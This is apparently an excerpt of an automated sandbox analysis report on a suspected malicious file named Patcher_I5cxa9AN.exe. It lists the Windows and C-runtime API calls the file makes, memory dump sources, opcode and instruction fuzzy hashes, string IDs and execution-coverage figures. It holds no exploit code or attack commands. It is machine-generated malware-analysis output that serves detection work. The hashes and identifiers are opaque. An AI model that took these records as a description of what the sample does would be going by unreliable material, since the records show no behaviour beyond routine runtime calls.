                                                                                              • Opcode Fuzzy Hash: 519a0880a837ff6766baf095d3bf4e1c22db58bcc1b081d877b8bab8baf9f24c
                                                                                              • Instruction Fuzzy Hash: 59318BB450C701CBC310DF5498A526BBBF1EF82358F504A1CF6968BB60E339D158CB9A
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6CDE8487
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6CDE848F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6CDE8518
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6CDE8543
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6CDE8598
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: e39129be2eb62b99e6b223162fd5ca20aefd3651f23e0c692bc32a147feae579
                                                                                              • Instruction ID: 228fb0e6d7c9778a4fb1b4c48b4eca805ac5af2b36af51b107f8623dce824adc
                                                                                              • Opcode Fuzzy Hash: e39129be2eb62b99e6b223162fd5ca20aefd3651f23e0c692bc32a147feae579
                                                                                              • Instruction Fuzzy Hash: B0417234A01258DBCF00CF6CCC84A9EBBB5EF4932CF10815AD824AB761DB31DA55CBA1
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,6CDED429,00000000,6CDEAC30,00000000,00000000,00000001,?,6CDED5A2,00000022,FlsSetValue,6CDF4678,6CDF4680,00000000), ref: 6CDED3DB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-$ext-ms-
                                                                                              • API String ID: 3664257935-537541572
                                                                                              • Opcode ID: 09e4ff33f6463b5da84caa61039629811951b4edd6cdde75c6e1d0ae1155a3cf
                                                                                              • Instruction ID: 1aa39a05a676ce185e86ef4036ccee9ee63e481866b59e8a752133e0415c630a
                                                                                              • Opcode Fuzzy Hash: 09e4ff33f6463b5da84caa61039629811951b4edd6cdde75c6e1d0ae1155a3cf
                                                                                              • Instruction Fuzzy Hash: 5121A831B45610FBDB11AF25DC40A4E7779EB8B368B260215E925A7A90DF30E905C6F1
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000001,?,6CDE8631,6CDE7720,6CDE7139,?,6CDE7371,?,00000001,?,?,00000001,?,6CDF8428,0000000C,6CDE746A), ref: 6CDE8A15
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CDE8A23
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CDE8A3C
                                                                                              • SetLastError.KERNEL32(00000000,6CDE7371,?,00000001,?,?,00000001,?,6CDF8428,0000000C,6CDE746A,?,00000001,?), ref: 6CDE8A8E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: c95c92e9b4571b6f5fff42e79b9915baa97c59206600097e68662bd3fb8123e2
                                                                                              • Instruction ID: 09844a1fdd294013b24c3b8493138dee6bd1f037cea3b7f1c5b333a0b6606a37
                                                                                              • Opcode Fuzzy Hash: c95c92e9b4571b6f5fff42e79b9915baa97c59206600097e68662bd3fb8123e2
                                                                                              • Instruction Fuzzy Hash: 7A01AC323097619EAB151B7DACC499A37B8FB0F7BD724432BF52095DF0EF52480595A0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ({)u$2_Y$3[0U$5g7a$7k$7o>i$_~7
                                                                                              • API String ID: 0-1483910529
                                                                                              • Opcode ID: 2b820bf1f48f7a15b5878a6aeaf6a260bb40cef50e36c6fbef9e211a8d6986cc
                                                                                              • Instruction ID: 7d073c06a1b435e2aeb28ca5e1f869e13dc4e0f80fdd139241a0232ec1aa2c4d
                                                                                              • Opcode Fuzzy Hash: 2b820bf1f48f7a15b5878a6aeaf6a260bb40cef50e36c6fbef9e211a8d6986cc
                                                                                              • Instruction Fuzzy Hash: 935167B5E442298FEB24CF65CC42BDEBBB2AB51304F1481DED049BB341D7B84A818F49
                                                                                              Strings
                                                                                              • C:\Users\user\Desktop\Patcher_I5cxa9AN.exe, xrefs: 6CDEC56A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe
                                                                                              • API String ID: 0-3496734076
                                                                                              • Opcode ID: a757055fb2fdd33d0641f251aae3d26c92d4e28c992341cc10008f3aa68ea7d0
                                                                                              • Instruction ID: facd6f6e5c42d1d28abb34acec1e3c0c3dd2c358e34c95a7f32070ff0ae63bda
                                                                                              • Opcode Fuzzy Hash: a757055fb2fdd33d0641f251aae3d26c92d4e28c992341cc10008f3aa68ea7d0
                                                                                              • Instruction Fuzzy Hash: F4216271204605BFDB20BF66CC50D9B7FADAF893687048619E91897A70D730E810C7A1
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6CDE900A,00000000,?,00000001,00000000,?,6CDE9081,00000001,FlsFree,6CDF3D4C,FlsFree,00000000), ref: 6CDE8FD9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3664257935-2084034818
                                                                                              • Opcode ID: c44786e98229fed3ef043beda85f7b66b429428a0627508de84a5583c83ba54f
                                                                                              • Instruction ID: 0710db3a3e6cf26909d8851aa4313156574984185bde62a924a65ac40128024d
                                                                                              • Opcode Fuzzy Hash: c44786e98229fed3ef043beda85f7b66b429428a0627508de84a5583c83ba54f
                                                                                              • Instruction Fuzzy Hash: 8911CA31A45520EBEF118B6C9C44B4A77F9AF0A778F160612FE24E76D0D730ED0086D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 9F7D$A^$BN=L$F6V4$O:B8$V"V $c.S,
                                                                                              • API String ID: 0-3561881016
                                                                                              • Opcode ID: 49c2233f8d2de4a4e9264ec9512c8353f5c1fdcb5dcb08e88206d82168858186
                                                                                              • Instruction ID: da045541d80f809bf5efd3ca9e3e1962a59c416d32df91c994855c44e63e2589
                                                                                              • Opcode Fuzzy Hash: 49c2233f8d2de4a4e9264ec9512c8353f5c1fdcb5dcb08e88206d82168858186
                                                                                              • Instruction Fuzzy Hash: 9D21EEB054C3409BD314CF99809566FFBF5EB89718F408A1DB2958B251E3B986098B5B
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E7CFDE7A,00000000,?,00000000,6CDF2E62,000000FF,?,6CDEA4F8,?,?,6CDEA4CC,?), ref: 6CDEA593
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CDEA5A5
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,6CDF2E62,000000FF,?,6CDEA4F8,?,?,6CDEA4CC,?), ref: 6CDEA5C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 94b33df7e4e8de8ef42ea83826c56d91b53b4f3a83288a2cad0628fa1e7f5bb2
                                                                                              • Instruction ID: 0acb66583fee4916f43c75402bb23613c657ab7a2ba7c41ea662db2ecaa3fcf2
                                                                                              • Opcode Fuzzy Hash: 94b33df7e4e8de8ef42ea83826c56d91b53b4f3a83288a2cad0628fa1e7f5bb2
                                                                                              • Instruction Fuzzy Hash: E801A231A00659EFEF019F40CC08BAEBBBCFB05719F124626E935E3690DB34D904CA51
                                                                                              APIs
                                                                                              • __alloca_probe_16.LIBCMT ref: 6CDEF05A
                                                                                              • __alloca_probe_16.LIBCMT ref: 6CDEF123
                                                                                              • __freea.LIBCMT ref: 6CDEF18A
                                                                                                • Part of subcall function 6CDEE17A: RtlAllocateHeap.NTDLL(00000000,6CDECAC7,6CDEDE94,?,6CDECAC7,00000220,?,?,6CDEDE94), ref: 6CDEE1AC
                                                                                              • __freea.LIBCMT ref: 6CDEF19D
                                                                                              • __freea.LIBCMT ref: 6CDEF1AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1423051803-0
                                                                                              • Opcode ID: cf94959bfc39627816e9c5aa36eb6038374175450d5b4d4d99ddec042d6df805
                                                                                              • Instruction ID: 15f37a15bd3ce95db98449356fc5bc9967cc61af0d07c90226e6a0c9dba83a45
                                                                                              • Opcode Fuzzy Hash: cf94959bfc39627816e9c5aa36eb6038374175450d5b4d4d99ddec042d6df805
                                                                                              • Instruction Fuzzy Hash: 0151D67260160AEFEB104F64DC40EEB3AA9DF8D718B15052AFD18D7A70EB30CD5486B0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: /4$6w$a{$ic$ic
                                                                                              • API String ID: 0-573168150
                                                                                              • Opcode ID: 8035aeae8720a0d68b51cf620da5fc36368bed7e53a4547f443ab50661ffa11e
                                                                                              • Instruction ID: c96cff4d7789635bbbf4ff88cfe166bc04e5c8e796bfa03c6d5b767c5f10a52a
                                                                                              • Opcode Fuzzy Hash: 8035aeae8720a0d68b51cf620da5fc36368bed7e53a4547f443ab50661ffa11e
                                                                                              • Instruction Fuzzy Hash: 5151BCB50083518BD310CF19C8A13ABBBF1EF86328F144A5DE5E14BB90E3799915CB93
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 09$Ur[p$qw$20$><
                                                                                              • API String ID: 0-1156490904
                                                                                              • Opcode ID: a8020708e123d62a2f4719b0a356841bb01bdb86f7a70c960633a322ed400623
                                                                                              • Instruction ID: 4f76f8690ffb16bf42f1be8e2edff86f64a29c586eb3abd2c4cfea0f00d5e71b
                                                                                              • Opcode Fuzzy Hash: a8020708e123d62a2f4719b0a356841bb01bdb86f7a70c960633a322ed400623
                                                                                              • Instruction Fuzzy Hash: CF51EAB1119381CBE335CF55C581B9FBBA1BB91340F208A0CD6E92B265DBB08455CF9B
                                                                                              APIs
                                                                                              • GetConsoleOutputCP.KERNEL32(E7CFDE7A,00000000,00000000,?), ref: 6CDEF745
                                                                                                • Part of subcall function 6CDED11C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CDEF180,?,00000000,-00000008), ref: 6CDED17D
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CDEF997
                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CDEF9DD
                                                                                              • GetLastError.KERNEL32 ref: 6CDEFA80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                              • String ID:
                                                                                              • API String ID: 2112829910-0
                                                                                              • Opcode ID: 366b6b29c903fe82fbd1ea67ab79120f6e3e5703e6a4f9a4a2f67daf6dbbad08
                                                                                              • Instruction ID: 031c605c727ab332eafa52e240340f3852fec3ad78105b45d7a1a01a671e9692
                                                                                              • Opcode Fuzzy Hash: 366b6b29c903fe82fbd1ea67ab79120f6e3e5703e6a4f9a4a2f67daf6dbbad08
                                                                                              • Instruction Fuzzy Hash: 60D189B5E00258AFCB11CFA8D8C0A9DBBB9FF0D314F24452AE465AB761D730A902CB50
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer
                                                                                              • String ID:
                                                                                              • API String ID: 1740715915-0
                                                                                              • Opcode ID: c754b0108d60862092fe04998c74c759ad6a891b2483d968ee058b803d0742bb
                                                                                              • Instruction ID: 18df46570711b97ed7bbceba635d2bbef64ddfe2b7d463afaf273315508a9d9e
                                                                                              • Opcode Fuzzy Hash: c754b0108d60862092fe04998c74c759ad6a891b2483d968ee058b803d0742bb
                                                                                              • Instruction Fuzzy Hash: E351D071607202EFEF158F15D840BEB77A5EF4D328F60462AE86597AB0E731D845C7A0
                                                                                              APIs
                                                                                                • Part of subcall function 6CDED11C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CDEF180,?,00000000,-00000008), ref: 6CDED17D
                                                                                              • GetLastError.KERNEL32 ref: 6CDEBDCC
                                                                                              • __dosmaperr.LIBCMT ref: 6CDEBDD3
                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 6CDEBE0D
                                                                                              • __dosmaperr.LIBCMT ref: 6CDEBE14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1913693674-0
                                                                                              • Opcode ID: 0512e2f5a9749d569ca0cda172ec6a4ac03bc401f6b063ba817fd95a7d344bf5
                                                                                              • Instruction ID: 081cf1c8c14f7eabfdb626a8553af093de9404dd315b02838450ae14cbfe33d0
                                                                                              • Opcode Fuzzy Hash: 0512e2f5a9749d569ca0cda172ec6a4ac03bc401f6b063ba817fd95a7d344bf5
                                                                                              • Instruction Fuzzy Hash: 26219571604715FFDB10AF66C880DABBBADFF4D3687048519E95997AA0D730FC108BA4
                                                                                              APIs
                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6CDF0818,00000000,00000001,00000000,?,?,6CDEFAD4,?,00000000,00000000), ref: 6CDF107D
                                                                                              • GetLastError.KERNEL32(?,6CDF0818,00000000,00000001,00000000,?,?,6CDEFAD4,?,00000000,00000000,?,?,?,6CDF0079,00000000), ref: 6CDF1089
                                                                                                • Part of subcall function 6CDF104F: CloseHandle.KERNEL32(FFFFFFFE,6CDF1099,?,6CDF0818,00000000,00000001,00000000,?,?,6CDEFAD4,?,00000000,00000000,?,?), ref: 6CDF105F
                                                                                              • ___initconout.LIBCMT ref: 6CDF1099
                                                                                                • Part of subcall function 6CDF1011: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CDF1040,6CDF0805,?,?,6CDEFAD4,?,00000000,00000000,?), ref: 6CDF1024
                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6CDF0818,00000000,00000001,00000000,?,?,6CDEFAD4,?,00000000,00000000,?), ref: 6CDF10AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                              • String ID:
                                                                                              • API String ID: 2744216297-0
                                                                                              • Opcode ID: 7864d2264f144cd7837177f36173260a2b9f24109601042f46f798234164b027
                                                                                              • Instruction ID: 413e2cd6543b584b9965e192e35a60092c357f579838427bc8097ae05eaee8cb
                                                                                              • Opcode Fuzzy Hash: 7864d2264f144cd7837177f36173260a2b9f24109601042f46f798234164b027
                                                                                              • Instruction Fuzzy Hash: F8F0C076640564BBCF125F95DD049897F7AFB093B5B064111FB2CD6520CB32C921EB91
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6CDE9788
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 2118026453-2084237596
                                                                                              • Opcode ID: 5111a93b67da000ab84cb5274019ce715acd05181af1924178377718a27f07e3
                                                                                              • Instruction ID: f8ed498f3203e1484495868d3685639fbf88acc26981f3eb53a2fd79ad37edaf
                                                                                              • Opcode Fuzzy Hash: 5111a93b67da000ab84cb5274019ce715acd05181af1924178377718a27f07e3
                                                                                              • Instruction Fuzzy Hash: FA416572901209EFCF06DF98DC80AEEBBB5BF4C308F1481A9F919A6630D3359951DB61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: =CkQ$HCkQ$MJ$PNrL
                                                                                              • API String ID: 0-2499749531
                                                                                              • Opcode ID: 4e5e61dc259169d4dce52f50e6e2b03d8cfed9bad837fe2faac07a4ac5acb382
                                                                                              • Instruction ID: 40646e4c323c6437c78f12f4466b909e882400620ed470e5cbbfd785e02b4c59
                                                                                              • Opcode Fuzzy Hash: 4e5e61dc259169d4dce52f50e6e2b03d8cfed9bad837fe2faac07a4ac5acb382
                                                                                              • Instruction Fuzzy Hash: B5311272A1D3108BD318CF29C85174FBBE2EFC6308F19C92DE0A55B684CA7599068B86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #C(]$.WPQ$IF$ZK
                                                                                              • API String ID: 0-2592460882
                                                                                              • Opcode ID: 9b40b38338014db78875a7e5b637bdb106c268fbc49315eb31b48e0be97dbb95
                                                                                              • Instruction ID: caa8453e64869d0488a75723cd78fd326b561d925202f678cad15f60cc532c9f
                                                                                              • Opcode Fuzzy Hash: 9b40b38338014db78875a7e5b637bdb106c268fbc49315eb31b48e0be97dbb95
                                                                                              • Instruction Fuzzy Hash: 584112B00183819BE3709F21E955B9BBBF4FB82758F109E1DD4C89B291D739840ACB67

                                                                                              Execution Graph

                                                                                              Execution Coverage:8.8%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:22.8%
                                                                                              Total number of Nodes:202
                                                                                              Total number of Limit Nodes:9
